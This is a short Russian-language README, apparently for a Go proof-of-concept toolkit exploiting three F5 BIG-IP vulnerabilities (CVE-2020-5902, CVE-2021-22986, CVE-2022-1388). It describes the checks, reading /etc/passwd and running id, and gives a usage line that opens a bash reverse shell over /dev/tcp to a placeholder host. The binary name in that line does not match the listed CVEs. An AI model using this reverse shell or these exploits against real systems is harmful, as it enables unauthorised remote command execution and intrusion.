
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 набор POC
Набор POC для CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 на языке Go. В дальнейшем будут добавлены другие POC для F5.
author:160team.west9B
Только для использования авторизованными специалистами по безопасности. Соблюдайте закон о кибербезопасности. Любые последствия — на вашей ответственности, автор к ним отношения не имеет.
Набор POC для F5:
CVE-2020-5902: F5 BIG-IP — уязвимость удалённого выполнения кода
CVE-2021-22986: F5 BIG-IP iControl REST — уязвимость неавторизованного удалённого выполнения команд
CVE-2022-1388: обход аутентификации и удалённое выполнение команд
CVE-2020-5902 проверяется через произвольное скачивание файлов: если возвращается /etc/passwd, уязвимость существует.
CVE-2021-22986, CVE-2022-1388: POC по умолчанию выполняет команду id; если возвращается {id}, уязвимость существует. Можно указать свою команду с помощью -c.
Использование: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"